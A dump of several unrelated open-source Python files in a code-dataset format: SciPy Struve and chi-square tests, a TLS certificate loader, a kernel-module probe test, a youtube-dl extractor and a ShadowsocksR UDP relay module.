r = (-1)**k * (.5*z)**(2*k+v+1)/special.gamma(k+1.5)/special.gamma(k+v+1.5)
err = abs(r).max() * finfo(float_).eps * n
return r.sum(), err
def test_vs_series(self):
"""Check Struve function versus its power series"""
for v in [-20, -10, -7.99, -3.4, -1, 0, 1, 3.4, 12.49, 16]:
for z in [1, 10, 19, 21, 30]:
value, err = self._series(v, z)
assert_tol_equal(special.struve(v, z), value, rtol=0, atol=err), (v, z)
def test_some_values(self):
assert_tol_equal(special.struve(-7.99, 21), 0.0467547614113, rtol=1e-7)
assert_tol_equal(special.struve(-8.01, 21), 0.0398716951023, rtol=1e-8)
assert_tol_equal(special.struve(-3.0, 200), 0.0142134427432, rtol=1e-12)
assert_tol_equal(special.struve(-8.0, -41), 0.0192469727846, rtol=1e-11)
assert_equal(special.struve(-12, -41), -special.struve(-12, 41))
assert_equal(special.struve(+12, -41), -special.struve(+12, 41))
assert_equal(special.struve(-11, -41), +special.struve(-11, 41))
assert_equal(special.struve(+11, -41), +special.struve(+11, 41))
assert_(isnan(special.struve(-7.1, -1)))
assert_(isnan(special.struve(-10.1, -1)))
def test_regression_679(self):
"""Regression test for #679"""
assert_tol_equal(special.struve(-1.0, 20 - 1e-8), special.struve(-1.0, 20 + 1e-8))
assert_tol_equal(special.struve(-2.0, 20 - 1e-8), special.struve(-2.0, 20 + 1e-8))
assert_tol_equal(special.struve(-4.3, 20 - 1e-8), special.struve(-4.3, 20 + 1e-8))
def test_chi2_smalldf():
    """Chi-square CDF with a small fractional df."""
    cdf = special.chdtr(0.6, 3)
    assert_almost_equal(cdf, 0.957890536704110)
def test_chi2c_smalldf():
    """Chi-square survival function (complement) with a small fractional df."""
    sf = special.chdtrc(0.6, 3)
    assert_almost_equal(sf, 1 - 0.957890536704110)
def test_chi2_inv_smalldf():
    """Inverting the complemented CDF must recover the original argument."""
    x = special.chdtri(0.6, 1 - 0.957890536704110)
    assert_almost_equal(x, 3)
if __name__ == "__main__":
run_module_suite()
| gpl-3.0 |
AGProjects/msrprelay | msrp/tls.py | 1 | 1533 |
__all__ = ['Certificate', 'PrivateKey']
from gnutls.crypto import X509Certificate, X509PrivateKey
from application.process import process
class _FileError(Exception): pass
def file_content(file):
    """Return the text contents of *file*, resolved via the process configuration.

    Raises _FileError if the file does not exist or cannot be opened.
    """
    path = process.configuration.file(file)
    if path is None:
        raise _FileError("File '%s' does not exist" % file)
    try:
        # BUG FIX: a bare 'except:' also swallowed KeyboardInterrupt/SystemExit;
        # catch only the I/O errors open() can actually raise.
        f = open(path, 'rt')
    except (IOError, OSError):
        raise _FileError("File '%s' could not be open" % file)
    # context manager guarantees the handle is closed after reading
    with f:
        return f.read()
class Certificate(object):
    """Configuration data type. Used to create a gnutls.crypto.X509Certificate object
    from a file given in the configuration file."""
    def __new__(cls, value):
        # Factory: returns an X509Certificate instance, not a Certificate.
        if isinstance(value, str):
            try:
                return X509Certificate(file_content(value))
            except Exception as e:
                # surface parse/read failures as a configuration error
                raise ValueError("Certificate file '%s' could not be loaded: %s" % (value, str(e)))
        else:
            raise TypeError('value should be a string')
class PrivateKey(object):
    """Configuration data type. Used to create a gnutls.crypto.X509PrivateKey object
    from a file given in the configuration file."""
    def __new__(cls, value):
        # guard clause first; the "constructor" acts as a factory and
        # returns an X509PrivateKey instance
        if not isinstance(value, str):
            raise TypeError('value should be a string')
        try:
            return X509PrivateKey(file_content(value))
        except Exception as e:
            raise ValueError("Private key file '%s' could not be loaded: %s" % (value, str(e)))
| gpl-2.0 |
ldoktor/autotest | client/virt/tests/module_probe.py | 2 | 1885 | import re, commands, logging, os
from autotest.client.shared import error, utils
from autotest.client.virt import base_installer
def run_module_probe(test, params, env):
    """
    load/unload kernel modules several times.

    The test can run in two modes:

    - based on previous 'build' test: in case kernel modules were installed by a
      'build' test, we used the modules installed by the previous test.
    - based on own params: if no previous 'build' test was run,
      we assume pre-installed kernel modules.
    """
    installer_object = env.previous_installer()
    if installer_object is None:
        installer_object = base_installer.NoopInstaller('noop',
                                                        'module_probe',
                                                        test, params)
    logging.debug('installer object: %r', installer_object)
    # unload the modules before starting:
    installer_object.unload_modules()

    load_count = int(params.get("load_count", 100))
    try:
        for i in range(load_count):
            try:
                installer_object.load_modules()
            # BUG FIX: 'except Exception,e' is Python-2-only syntax; 'as'
            # works on Python 2.6+ and 3.x alike.
            except Exception as e:
                raise error.TestFail("Failed to load modules [%r]: %s" %
                                     (installer_object.module_list, e))

            # unload using rmmod directly because utils.unload_module() (used by
            # installer) does too much (runs lsmod, checks for dependencies),
            # and we want to run the loop as fast as possible.
            for mod in reversed(installer_object.module_list):
                r = utils.system("rmmod %s" % (mod), ignore_status=True)
                # BUG FIX: the deprecated '<>' operator was removed in
                # Python 3; '!=' is equivalent on all versions.
                if r != 0:
                    raise error.TestFail("Failed to unload module %s. "
                                         "exit status: %d" % (mod, r))
    finally:
        installer_object.load_modules()
| gpl-2.0 |
nyuszika7h/youtube-dl | youtube_dl/extractor/playwire.py | 64 | 2408 | from __future__ import unicode_literals
import re
from .common import InfoExtractor
from ..utils import (
dict_get,
float_or_none,
)
class PlaywireIE(InfoExtractor):
    """Extractor for Playwire-hosted videos (config/cdn.playwire.com URLs)."""

    # Captures the numeric publisher and video ids from any supported URL form.
    _VALID_URL = r'https?://(?:config|cdn)\.playwire\.com(?:/v2)?/(?P<publisher_id>\d+)/(?:videos/v2|embed|config)/(?P<id>\d+)'
    _TESTS = [{
        'url': 'http://config.playwire.com/14907/videos/v2/3353705/player.json',
        'md5': 'e6398701e3595888125729eaa2329ed9',
        'info_dict': {
            'id': '3353705',
            'ext': 'mp4',
            'title': 'S04_RM_UCL_Rus',
            'thumbnail': r're:^https?://.*\.png$',
            'duration': 145.94,
        },
    }, {
        # m3u8 in f4m
        'url': 'http://config.playwire.com/21772/videos/v2/4840492/zeus.json',
        'info_dict': {
            'id': '4840492',
            'ext': 'mp4',
            'title': 'ITV EL SHOW FULL',
        },
        'params': {
            # m3u8 download
            'skip_download': True,
        },
    }, {
        # Multiple resolutions while bitrates missing
        'url': 'http://cdn.playwire.com/11625/embed/85228.html',
        'only_matching': True,
    }, {
        'url': 'http://config.playwire.com/12421/videos/v2/3389892/zeus.json',
        'only_matching': True,
    }, {
        'url': 'http://cdn.playwire.com/v2/12342/config/1532636.json',
        'only_matching': True,
    }]

    def _real_extract(self, url):
        """Fetch the zeus.json player config and build the info dict."""
        mobj = re.match(self._VALID_URL, url)
        publisher_id, video_id = mobj.group('publisher_id'), mobj.group('id')

        # the canonical zeus.json endpoint works regardless of which URL
        # form was matched
        player = self._download_json(
            'http://config.playwire.com/%s/videos/v2/%s/zeus.json' % (publisher_id, video_id),
            video_id)

        title = player['settings']['title']
        duration = float_or_none(player.get('duration'), 1000)  # ms -> s

        content = player['content']

        thumbnail = content.get('poster')
        src = content['media']['f4m']

        formats = self._extract_f4m_formats(src, video_id, m3u8_id='hls')
        for a_format in formats:
            if not dict_get(a_format, ['tbr', 'width', 'height']):
                # no bitrate/resolution metadata: rank '-hd.' variants higher
                a_format['quality'] = 1 if '-hd.' in a_format['url'] else 0
        self._sort_formats(formats)

        return {
            'id': video_id,
            'title': title,
            'thumbnail': thumbnail,
            'duration': duration,
            'formats': formats,
        }
| unlicense |
beermix/source | package/lienol/luci-app-ssr-mudb-server/root/usr/share/ssr_mudb_server/shadowsocks/udprelay.py | 2 | 25774 | #!/usr/bin/python3
# -*- coding: utf-8 -*-
#
# Copyright 2015 clowwindy
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
# SOCKS5 UDP Request
# +----+------+------+----------+----------+----------+
# |RSV | FRAG | ATYP | DST.ADDR | DST.PORT | DATA |
# +----+------+------+----------+----------+----------+
# | 2 | 1 | 1 | Variable | 2 | Variable |
# +----+------+------+----------+----------+----------+
# SOCKS5 UDP Response
# +----+------+------+----------+----------+----------+
# |RSV | FRAG | ATYP | DST.ADDR | DST.PORT | DATA |
# +----+------+------+----------+----------+----------+
# | 2 | 1 | 1 | Variable | 2 | Variable |
# +----+------+------+----------+----------+----------+
# shadowsocks UDP Request (before encrypted)
# +------+----------+----------+----------+
# | ATYP | DST.ADDR | DST.PORT | DATA |
# +------+----------+----------+----------+
# | 1 | Variable | 2 | Variable |
# +------+----------+----------+----------+
# shadowsocks UDP Response (before encrypted)
# +------+----------+----------+----------+
# | ATYP | DST.ADDR | DST.PORT | DATA |
# +------+----------+----------+----------+
# | 1 | Variable | 2 | Variable |
# +------+----------+----------+----------+
# shadowsocks UDP Request and Response (after encrypted)
# +-------+--------------+
# | IV | PAYLOAD |
# +-------+--------------+
# | Fixed | Variable |
# +-------+--------------+
# HOW TO NAME THINGS
# ------------------
# `dest` means destination server, which is from DST fields in the SOCKS5
# request
# `local` means local server of shadowsocks
# `remote` means remote server of shadowsocks
# `client` means UDP clients that connects to other servers
# `server` means the UDP server that handles user requests
from __future__ import absolute_import, division, print_function, \
with_statement
import time
import socket
import logging
import struct
import errno
import random
import binascii
import traceback
import threading
from shadowsocks import encrypt, obfs, eventloop, lru_cache, common, shell
from shadowsocks.common import pre_parse_header, parse_header, pack_addr
# for each handler, we have 2 stream directions:
# upstream: from client to server direction
# read local and write to remote
# downstream: from server to client direction
# read remote and write to local
STREAM_UP = 0
STREAM_DOWN = 1
# for each stream, it's waiting for reading, or writing, or both
WAIT_STATUS_INIT = 0
WAIT_STATUS_READING = 1
WAIT_STATUS_WRITING = 2
WAIT_STATUS_READWRITING = WAIT_STATUS_READING | WAIT_STATUS_WRITING
BUF_SIZE = 65536
DOUBLE_SEND_BEG_IDS = 16
POST_MTU_MIN = 500
POST_MTU_MAX = 1400
SENDING_WINDOW_SIZE = 8192
STAGE_INIT = 0
STAGE_RSP_ID = 1
STAGE_DNS = 2
STAGE_CONNECTING = 3
STAGE_STREAM = 4
STAGE_DESTROYED = -1
CMD_CONNECT = 0
CMD_RSP_CONNECT = 1
CMD_CONNECT_REMOTE = 2
CMD_RSP_CONNECT_REMOTE = 3
CMD_POST = 4
CMD_SYN_STATUS = 5
CMD_POST_64 = 6
CMD_SYN_STATUS_64 = 7
CMD_DISCONNECT = 8
CMD_VER_STR = b"\x08"
RSP_STATE_EMPTY = b""
RSP_STATE_REJECT = b"\x00"
RSP_STATE_CONNECTED = b"\x01"
RSP_STATE_CONNECTEDREMOTE = b"\x02"
RSP_STATE_ERROR = b"\x03"
RSP_STATE_DISCONNECT = b"\x04"
RSP_STATE_REDIRECT = b"\x05"
def client_key(source_addr, server_af):
    """Cache key for a client: source host, source port, address family.

    Note: this is the *server* address family, not the destination's.
    """
    host, port = source_addr[0], source_addr[1]
    return '%s:%s:%d' % (host, port, server_af)
class UDPRelay(object):
def __init__(self, config, dns_resolver, is_local, stat_callback=None, stat_counter=None):
self._config = config
if config.get('connect_verbose_info', 0) > 0:
common.connect_log = logging.info
if is_local:
self._listen_addr = config['local_address']
self._listen_port = config['local_port']
self._remote_addr = config['server']
self._remote_port = config['server_port']
else:
self._listen_addr = config['server']
self._listen_port = config['server_port']
self._remote_addr = None
self._remote_port = None
self._dns_resolver = dns_resolver
self._password = common.to_bytes(config['password'])
self._method = config['method']
self._timeout = config['timeout']
self._is_local = is_local
self._udp_cache_size = config['udp_cache']
self._cache = lru_cache.LRUCache(timeout=config['udp_timeout'],
close_callback=self._close_client_pair)
self._cache_dns_client = lru_cache.LRUCache(timeout=10,
close_callback=self._close_client_pair)
self._client_fd_to_server_addr = {}
#self._dns_cache = lru_cache.LRUCache(timeout=1800)
self._eventloop = None
self._closed = False
self.server_transfer_ul = 0
self.server_transfer_dl = 0
self.server_users = {}
self.server_user_transfer_ul = {}
self.server_user_transfer_dl = {}
if common.to_bytes(config['protocol']) in obfs.mu_protocol():
self._update_users(None, None)
self.protocol_data = obfs.obfs(config['protocol']).init_data()
self._protocol = obfs.obfs(config['protocol'])
server_info = obfs.server_info(self.protocol_data)
server_info.host = self._listen_addr
server_info.port = self._listen_port
server_info.users = self.server_users
server_info.protocol_param = config['protocol_param']
server_info.obfs_param = ''
server_info.iv = b''
server_info.recv_iv = b''
server_info.key_str = common.to_bytes(config['password'])
server_info.key = encrypt.encrypt_key(self._password, self._method)
server_info.head_len = 30
server_info.tcp_mss = 1452
server_info.buffer_size = BUF_SIZE
server_info.overhead = 0
self._protocol.set_server_info(server_info)
self._sockets = set()
self._fd_to_handlers = {}
self._reqid_to_hd = {}
self._data_to_write_to_server_socket = []
self._timeout_cache = lru_cache.LRUCache(timeout=self._timeout,
close_callback=self._close_tcp_client)
self._bind = config.get('out_bind', '')
self._bindv6 = config.get('out_bindv6', '')
self._ignore_bind_list = config.get('ignore_bind', [])
if 'forbidden_ip' in config:
self._forbidden_iplist = config['forbidden_ip']
else:
self._forbidden_iplist = None
if 'forbidden_port' in config:
self._forbidden_portset = config['forbidden_port']
else:
self._forbidden_portset = None
addrs = socket.getaddrinfo(self._listen_addr, self._listen_port, 0,
socket.SOCK_DGRAM, socket.SOL_UDP)
if len(addrs) == 0:
raise Exception("can't get addrinfo for %s:%d" %
(self._listen_addr, self._listen_port))
af, socktype, proto, canonname, sa = addrs[0]
server_socket = socket.socket(af, socktype, proto)
server_socket.bind((self._listen_addr, self._listen_port))
server_socket.setblocking(False)
self._server_socket = server_socket
self._stat_callback = stat_callback
def _get_a_server(self):
server = self._config['server']
server_port = self._config['server_port']
if type(server_port) == list:
server_port = random.choice(server_port)
if type(server) == list:
server = random.choice(server)
logging.debug('chosen server: %s:%d', server, server_port)
return server, server_port
def get_ud(self):
    """Return the (upload, download) byte totals for this server port."""
    return self.server_transfer_ul, self.server_transfer_dl
def get_users_ud(self):
    """Return *copies* of the per-user (upload, download) counter dicts."""
    uploads = self.server_user_transfer_ul.copy()
    downloads = self.server_user_transfer_dl.copy()
    return (uploads, downloads)
def _update_users(self, protocol_param, acl):
if protocol_param is None:
protocol_param = self._config['protocol_param']
param = common.to_bytes(protocol_param).split(b'#')
if len(param) == 2:
user_list = param[1].split(b',')
if user_list:
for user in user_list:
items = user.split(b':')
if len(items) == 2:
user_int_id = int(items[0])
uid = struct.pack('<I', user_int_id)
if acl is not None and user_int_id not in acl:
self.del_user(uid)
else:
passwd = items[1]
self.add_user(uid, {'password':passwd})
def _update_user(self, id, passwd):
uid = struct.pack('<I', id)
self.add_user(uid, passwd)
def update_users(self, users):
    """Sync the user table: drop uids absent from *users*, then upsert the rest.

    *users* maps integer user id -> config dict (as taken by add_user).
    """
    for uid in list(self.server_users.keys()):
        if struct.unpack('<I', uid)[0] not in users:
            self.del_user(uid)
    for user_id in users:
        self.add_user(struct.pack('<I', user_id), users[user_id])
def add_user(self, uid, cfg):  # uid: binstr[4], cfg: {'password': str}
    """Insert or overwrite a user entry; the password is stored as bytes."""
    self.server_users[uid] = common.to_bytes(cfg['password'])
def del_user(self, uid):
    """Forget a user; a no-op when the uid is unknown."""
    self.server_users.pop(uid, None)
def add_transfer_u(self, user, transfer):
    """Account uploaded bytes.

    Anonymous traffic (user is None) accumulates on the server-wide counter.
    Identified traffic records the new bytes plus any pending server-wide
    amount, which is then flushed to zero.
    """
    if user is None:
        self.server_transfer_ul += transfer
        return
    self.server_user_transfer_ul.setdefault(user, 0)
    self.server_user_transfer_ul[user] += transfer + self.server_transfer_ul
    self.server_transfer_ul = 0
    def add_transfer_d(self, user, transfer):
        """Account *transfer* downloaded bytes to *user* (None = server-wide).

        Mirrors add_transfer_u: when a user is known, any bytes previously
        accumulated in the anonymous server counter are folded into that
        user's bucket and the server counter is reset.
        """
        if user is None:
            self.server_transfer_dl += transfer
        else:
            if user not in self.server_user_transfer_dl:
                self.server_user_transfer_dl[user] = 0
            self.server_user_transfer_dl[user] += transfer + self.server_transfer_dl
            self.server_transfer_dl = 0
def _close_client_pair(self, client_pair):
client, uid = client_pair
self._close_client(client)
    def _close_client(self, client):
        """Unregister *client* from the event loop and close it.

        The cache may hold either real sockets or plain addresses; only
        objects with a close() method are treated as sockets.
        """
        if hasattr(client, 'close'):
            if not self._is_local:
                if client.fileno() in self._client_fd_to_server_addr:
                    logging.debug('close_client: %s' %
                                  (self._client_fd_to_server_addr[client.fileno()],))
                else:
                    # NOTE(review): sockets have no .info(); presumably this
                    # was meant to be logging.info -- confirm.
                    client.info('close_client')
            self._sockets.remove(client.fileno())
            self._eventloop.remove(client)
            del self._client_fd_to_server_addr[client.fileno()]
            client.close()
        else:
            # just an address
            # NOTE(review): an address tuple has no .info() either; this
            # branch would raise if ever reached -- confirm intent.
            client.info('close_client pass %s' % client)
            pass
def _handel_protocol_error(self, client_address, ogn_data):
#raise Exception('can not parse header')
logging.warn("Protocol ERROR, UDP ogn data %s from %s:%d" % (binascii.hexlify(ogn_data), client_address[0], client_address[1]))
    def _socket_bind_addr(self, sock, af):
        """Bind the outgoing socket to the configured local address, if any.

        Picks self._bind for IPv4 or self._bindv6 for IPv6, skips addresses
        on the ignore list, and binds with port 0 (ephemeral). Bind failures
        are logged but not fatal.
        """
        bind_addr = ''
        if self._bind and af == socket.AF_INET:
            bind_addr = self._bind
        elif self._bindv6 and af == socket.AF_INET6:
            bind_addr = self._bindv6
        # Strip the IPv4-mapped-IPv6 prefix so the address matches af.
        bind_addr = bind_addr.replace("::ffff:", "")
        if bind_addr in self._ignore_bind_list:
            bind_addr = None
        if bind_addr:
            local_addrs = socket.getaddrinfo(bind_addr, 0, 0, socket.SOCK_DGRAM, socket.SOL_UDP)
            # Only bind when the resolved family matches the socket family.
            if local_addrs[0][0] == af:
                logging.debug("bind %s" % (bind_addr,))
                try:
                    sock.bind((bind_addr, 0))
                except Exception as e:
                    logging.warn("bind %s fail" % (bind_addr,))
    def _handle_server(self):
        """Read one datagram from the listening socket and start relaying it.

        Local mode: strips the 3-byte SOCKS5 UDP header (dropping fragmented
        packets). Server mode: decrypts and runs protocol post-decryption,
        then parses the target address and hands off to
        _handle_server_dns_resolved (via async DNS when the target is a
        hostname).
        """
        server = self._server_socket
        data, r_addr = server.recvfrom(BUF_SIZE)
        ogn_data = data
        # NOTE(review): empty data is only logged, not returned from --
        # data[2] below would raise IndexError; presumably recvfrom never
        # yields empty data here, confirm.
        if not data:
            logging.debug('UDP handle_server: data is empty')
        if self._stat_callback:
            self._stat_callback(self._listen_port, len(data))
        uid = None
        if self._is_local:
            # SOCKS5 UDP request: RSV(2) FRAG(1); only FRAG == 0 supported.
            frag = common.ord(data[2])
            if frag != 0:
                logging.warn('drop a message since frag is not 0')
                return
            else:
                data = data[3:]
        else:
            # Third argument 0 selects decryption in encrypt_all_iv.
            ref_iv = [0]
            data = encrypt.encrypt_all_iv(self._protocol.obfs.server_info.key, self._method, 0, data, ref_iv)
            # decrypt data
            if not data:
                logging.debug('UDP handle_server: data is empty after decrypt')
                return
            self._protocol.obfs.server_info.recv_iv = ref_iv[0]
            data, uid = self._protocol.server_udp_post_decrypt(data)
        #logging.info("UDP data %s" % (binascii.hexlify(data),))
        if not self._is_local:
            data = pre_parse_header(data)
            if data is None:
                return
        try:
            header_result = parse_header(data)
        except:
            self._handel_protocol_error(r_addr, ogn_data)
            return
        if header_result is None:
            self._handel_protocol_error(r_addr, ogn_data)
            return
        connecttype, addrtype, dest_addr, dest_port, header_length = header_result
        if self._is_local:
            # Local mode always forwards to a configured server (addrtype 3
            # = hostname form).
            addrtype = 3
            server_addr, server_port = self._get_a_server()
        else:
            server_addr, server_port = dest_addr, dest_port
        if (addrtype & 7) == 3:
            af = common.is_ip(server_addr)
            if af == False:
                # Hostname: resolve asynchronously, then continue in the
                # callback with the same params tuple.
                handler = common.UDPAsyncDNSHandler((data, r_addr, uid, header_length))
                handler.resolve(self._dns_resolver, (server_addr, server_port), self._handle_server_dns_resolved)
            else:
                self._handle_server_dns_resolved("", (server_addr, server_port), server_addr, (data, r_addr, uid, header_length))
        else:
            self._handle_server_dns_resolved("", (server_addr, server_port), server_addr, (data, r_addr, uid, header_length))
    def _handle_server_dns_resolved(self, error, remote_addr, server_addr, params):
        """Continue relaying a datagram once the destination is resolved.

        Looks up (or creates and registers) the per-client outgoing socket,
        applies forbidden IP/port filtering, performs local-mode encryption
        or server-mode header stripping, and finally sends the payload.
        """
        if error:
            return
        data, r_addr, uid, header_length = params
        user_id = self._listen_port
        try:
            server_port = remote_addr[1]
            addrs = socket.getaddrinfo(server_addr, server_port, 0,
                                       socket.SOCK_DGRAM, socket.SOL_UDP)
            if not addrs: # drop
                return
            af, socktype, proto, canonname, sa = addrs[0]
            server_addr = sa[0]
            key = client_key(r_addr, af)
            # A cached pair is (socket, uid); DNS clients live in their own
            # short-lived cache.
            client_pair = self._cache.get(key, None)
            if client_pair is None:
                client_pair = self._cache_dns_client.get(key, None)
            if client_pair is None:
                if self._forbidden_iplist:
                    if common.to_str(sa[0]) in self._forbidden_iplist:
                        logging.debug('IP %s is in forbidden list, drop' % common.to_str(sa[0]))
                        # drop
                        return
                if self._forbidden_portset:
                    if sa[1] in self._forbidden_portset:
                        logging.debug('Port %d is in forbidden list, reject' % sa[1])
                        # drop
                        return
                client = socket.socket(af, socktype, proto)
                client_uid = uid
                client.setblocking(False)
                self._socket_bind_addr(client, af)
                is_dns = False
                # Heuristic DNS detection: standard query header flags
                # (QDCOUNT=1, everything else 0) right after the address header.
                if len(data) > header_length + 13 and data[header_length + 4 : header_length + 12] == b"\x00\x01\x00\x00\x00\x00\x00\x00":
                    is_dns = True
                else:
                    pass
                if sa[1] == 53 and is_dns: #DNS
                    logging.debug("DNS query %s from %s:%d" % (common.to_str(sa[0]), r_addr[0], r_addr[1]))
                    self._cache_dns_client[key] = (client, uid)
                else:
                    self._cache[key] = (client, uid)
                self._client_fd_to_server_addr[client.fileno()] = (r_addr, af)
                self._sockets.add(client.fileno())
                self._eventloop.add(client, eventloop.POLL_IN, self)
                logging.debug('UDP port %5d sockets %d' % (self._listen_port, len(self._sockets)))
                if uid is not None:
                    user_id = struct.unpack('<I', client_uid)[0]
            else:
                client, client_uid = client_pair
            # Opportunistic cache eviction on every request.
            self._cache.clear(self._udp_cache_size)
            self._cache_dns_client.clear(16)
            if self._is_local:
                ref_iv = [encrypt.encrypt_new_iv(self._method)]
                self._protocol.obfs.server_info.iv = ref_iv[0]
                data = self._protocol.client_udp_pre_encrypt(data)
                #logging.debug("%s" % (binascii.hexlify(data),))
                # Third argument 1 selects encryption in encrypt_all_iv.
                data = encrypt.encrypt_all_iv(self._protocol.obfs.server_info.key, self._method, 1, data, ref_iv)
                if not data:
                    return
            else:
                data = data[header_length:]
                if not data:
                    return
        except Exception as e:
            shell.print_exception(e)
            logging.error("exception from user %d" % (user_id,))
            # NOTE(review): execution falls through to the send below; if the
            # exception happened before `client`/`client_uid` were bound, the
            # sendto raises NameError -- a `return` here looks intended, confirm.
        try:
            client.sendto(data, (server_addr, server_port))
            self.add_transfer_u(client_uid, len(data))
            if client_pair is None: # new request
                addr, port = client.getsockname()[:2]
                common.connect_log('UDP data to %s(%s):%d from %s:%d by user %d' %
                                   (common.to_str(remote_addr[0]), common.to_str(server_addr), server_port, addr, port, user_id))
        except IOError as e:
            err = eventloop.errno_from_exception(e)
            logging.warning('IOError sendto %s:%d by user %d' % (server_addr, server_port, user_id))
            if err in (errno.EINPROGRESS, errno.EAGAIN):
                # Transient; the datagram is simply dropped.
                pass
            else:
                shell.print_exception(e)
    def _handle_client(self, sock):
        """Handle a reply datagram arriving on a per-client outgoing socket.

        Server mode: prepends the origin address and encrypts the reply.
        Local mode: decrypts/validates the reply and prepends the 3-byte
        SOCKS5 UDP header. The response is written back via the listening
        socket; one-shot DNS client sockets are torn down after replying.
        """
        data, r_addr = sock.recvfrom(BUF_SIZE)
        if not data:
            logging.debug('UDP handle_client: data is empty')
            return
        if self._stat_callback:
            self._stat_callback(self._listen_port, len(data))
        client_addr = self._client_fd_to_server_addr.get(sock.fileno())
        client_uid = None
        if client_addr:
            key = client_key(client_addr[0], client_addr[1])
            client_pair = self._cache.get(key, None)
            client_dns_pair = self._cache_dns_client.get(key, None)
            if client_pair:
                client, client_uid = client_pair
            elif client_dns_pair:
                client, client_uid = client_dns_pair
        if not self._is_local:
            # pack_addr encodes at most a 255-byte hostname/IP.
            addrlen = len(r_addr[0])
            if addrlen > 255:
                # drop
                return
            data = pack_addr(r_addr[0]) + struct.pack('>H', r_addr[1]) + data
            ref_iv = [encrypt.encrypt_new_iv(self._method)]
            self._protocol.obfs.server_info.iv = ref_iv[0]
            data = self._protocol.server_udp_pre_encrypt(data, client_uid)
            response = encrypt.encrypt_all_iv(self._protocol.obfs.server_info.key, self._method, 1,
                                              data, ref_iv)
            if not response:
                return
        else:
            ref_iv = [0]
            data = encrypt.encrypt_all_iv(self._protocol.obfs.server_info.key, self._method, 0,
                                          data, ref_iv)
            if not data:
                return
            self._protocol.obfs.server_info.recv_iv = ref_iv[0]
            data = self._protocol.client_udp_post_decrypt(data)
            header_result = parse_header(data)
            if header_result is None:
                return
            #connecttype, dest_addr, dest_port, header_length = header_result
            #logging.debug('UDP handle_client %s:%d to %s:%d' % (common.to_str(r_addr[0]), r_addr[1], dest_addr, dest_port))
            # RSV(2) + FRAG(1) SOCKS5 UDP header.
            response = b'\x00\x00\x00' + data
        if client_addr:
            if client_uid:
                self.add_transfer_d(client_uid, len(response))
            else:
                self.server_transfer_dl += len(response)
            self.write_to_server_socket(response, client_addr[0])
            if client_dns_pair:
                logging.debug("remove dns client %s:%d" % (client_addr[0][0], client_addr[0][1]))
                del self._cache_dns_client[key]
                self._close_client(client_dns_pair[0])
        else:
            # this packet is from somewhere else we know
            # simply drop that packet
            pass
    def write_to_server_socket(self, data, addr):
        """Send *data* to *addr* via the listening socket, draining any
        previously queued datagrams first.

        Returns False on a hard send error; EWOULDBLOCK is swallowed.
        """
        # `uncomplete`/`retry` only feed the commented-out retry logic at the
        # bottom; with it disabled they are effectively dead state.
        uncomplete = False
        retry = 0
        try:
            self._server_socket.sendto(data, addr)
            data = None
            while self._data_to_write_to_server_socket:
                data_buf = self._data_to_write_to_server_socket[0]
                retry = data_buf[1] + 1
                del self._data_to_write_to_server_socket[0]
                data, addr = data_buf[0]
                self._server_socket.sendto(data, addr)
        except (OSError, IOError) as e:
            error_no = eventloop.errno_from_exception(e)
            uncomplete = True
            if error_no in (errno.EWOULDBLOCK,):
                pass
            else:
                shell.print_exception(e)
                return False
        #if uncomplete and data is not None and retry < 3:
        #    self._data_to_write_to_server_socket.append([(data, addr), retry])
        #'''
def add_to_loop(self, loop):
if self._eventloop:
raise Exception('already add to loop')
if self._closed:
raise Exception('already closed')
self._eventloop = loop
server_socket = self._server_socket
self._eventloop.add(server_socket,
eventloop.POLL_IN | eventloop.POLL_ERR, self)
loop.add_periodic(self.handle_periodic)
def remove_handler(self, client):
if hash(client) in self._timeout_cache:
del self._timeout_cache[hash(client)]
def update_activity(self, client):
self._timeout_cache[hash(client)] = client
    def _sweep_timeout(self):
        # Evict handlers that have been idle past the cache's timeout.
        self._timeout_cache.sweep()
def _close_tcp_client(self, client):
if client.remote_address:
logging.debug('timed out: %s:%d' %
client.remote_address)
else:
logging.debug('timed out')
client.destroy()
client.destroy_local()
    def handle_event(self, sock, fd, event):
        """Event-loop callback: dispatch readiness on our sockets.

        The listening socket goes to _handle_server, per-client sockets to
        _handle_client, anything else to the registered fd handler.
        """
        if sock == self._server_socket:
            if event & eventloop.POLL_ERR:
                logging.error('UDP server_socket err')
            try:
                self._handle_server()
            except Exception as e:
                shell.print_exception(e)
                if self._config['verbose']:
                    traceback.print_exc()
        elif sock and (fd in self._sockets):
            if event & eventloop.POLL_ERR:
                logging.error('UDP client_socket err')
            try:
                self._handle_client(sock)
            except Exception as e:
                shell.print_exception(e)
                if self._config['verbose']:
                    traceback.print_exc()
        else:
            if sock:
                handler = self._fd_to_handlers.get(fd, None)
                if handler:
                    handler.handle_event(sock, event)
            else:
                logging.warn('poll removed fd')
    def handle_periodic(self):
        """Periodic tick: finish shutdown when closed, otherwise sweep caches."""
        if self._closed:
            # Deferred shutdown path (close(next_tick=True)): flush caches
            # and unregister/close the listening socket.
            self._cache.clear(0)
            self._cache_dns_client.clear(0)
            if self._eventloop:
                self._eventloop.remove_periodic(self.handle_periodic)
                self._eventloop.remove(self._server_socket)
            if self._server_socket:
                self._server_socket.close()
                self._server_socket = None
                logging.info('closed UDP port %d', self._listen_port)
        else:
            before_sweep_size = len(self._sockets)
            self._cache.sweep()
            self._cache_dns_client.sweep()
            # Only log when sweeping actually closed sockets.
            if before_sweep_size != len(self._sockets):
                logging.debug('UDP port %5d sockets %d' % (self._listen_port, len(self._sockets)))
            self._sweep_timeout()
    def close(self, next_tick=False):
        """Shut the relay down.

        With next_tick=False everything is torn down immediately; otherwise
        only the closed flag is set and handle_periodic finishes the job.
        """
        logging.debug('UDP close')
        self._closed = True
        if not next_tick:
            if self._eventloop:
                self._eventloop.remove_periodic(self.handle_periodic)
                self._eventloop.remove(self._server_socket)
            self._server_socket.close()
            self._cache.clear(0)
            self._cache_dns_client.clear(0)
| gpl-2.0 |
datafiniti/Diamond | src/collectors/mongodb/test/testmongodb.py | 2 | 10560 | #!/usr/bin/python
# coding=utf-8
################################################################################
from test import CollectorTestCase
from test import get_collector_config
from test import unittest
from test import run_only
from mock import MagicMock
from mock import patch
from mock import call
from diamond.collector import Collector
from mongodb import MongoDBCollector
################################################################################
def run_only_if_pymongo_is_available(func):
